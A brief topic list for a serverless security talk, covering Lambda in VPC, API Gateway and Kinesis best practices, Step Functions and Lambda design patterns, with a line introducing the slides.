  • Lambda in VPC
  • security
  • best practices with API Gateway and Kinesis
  • step functions
  • explore several design patterns with Lambda

Slides for my serverless security talk